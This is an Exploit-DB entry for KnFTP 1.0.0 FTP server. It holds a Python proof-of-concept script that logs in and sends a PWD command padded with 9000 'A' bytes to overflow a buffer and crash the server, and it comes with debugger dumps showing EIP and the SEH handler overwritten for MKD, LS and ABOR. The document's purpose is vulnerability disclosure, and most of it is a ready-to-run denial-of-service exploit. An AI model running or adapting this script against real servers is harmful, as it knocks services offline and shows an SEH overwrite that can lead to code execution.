KnFTP 1.0.0 Server - Multiple Buffer Overflows (PoC) (SEH)

EDB-ID:

17856


Author:

loneferret

Type:

dos


Platform:

Windows

Date:

2011-09-18


#!/usr/bin/python

# Title: KnFTP Server Buffer Overflow Exploit (DoS PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret (kinda)
# Bug that made me fuzz this app by Blake: http://www.exploit-db.com/exploits/17819/

# Date Found: Sept 18th 2011
# Tested on: Windows XP SP2/SP3 Professional (DEP off)
# Nod to the Exploit-DB Team
 
# Vulnerable commands: MKD / LS / ABOR / CD / APPE / REST / PWD
# So it just looks like all this app's commands are vulnerable. Even commands
# that the server doesn't support. SEH and/or EIP gets overwriten. 
# It's almost like this application was made to be vulnerable.
# Anyway have fun.

#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "MKD"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFE
#EIP 77C460C1 msvcrt.77C460C1
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDE000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
#               3 2 1 0      E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1


#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "LS"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFF
#EIP 77C460C1 msvcrt.77C460C1
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDE000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
#               3 2 1 0      E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

#SEH chain of thread 000001BC, item 0
#Address=00C7FFDC
#SE handler=41414141

#EAX 7EFEFEFE
#ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDX 41414141
#EBX 00C7FE92 ASCII "ABOR"
#ESP 00C7CD94
#EBP 00C7CDC4
#ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA...
#EDI 00C7FFFD
#EIP 77C460C1 msvcrt.77C460C1
#C 0  ES 0023 32bit 0(FFFFFFFF)
#P 1  CS 001B 32bit 0(FFFFFFFF)
#A 0  SS 0023 32bit 0(FFFFFFFF)
#Z 1  DS 0023 32bit 0(FFFFFFFF)
#S 0  FS 003B 32bit 7FFDD000(FFF)
#T 0  GS 0000 NULL
#D 0
#O 0  LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty 0.00000000000000000000
#ST1 empty 0.00000000000000000000
#ST2 empty 2.1219957909652723000e-314
#ST3 empty 0.00000000000000000000
#ST4 empty 0.00000000000000000000
#ST5 empty 0.00000000000000000000
#ST6 empty 0.00000000000000000000
#ST7 empty 1.2519775166695107000e-312
#               3 2 1 0      E S P U O Z D I
#FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
#FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1


import socket
 
 
buffer = "\x41" * 9000
 
 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
s.send('PWD ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close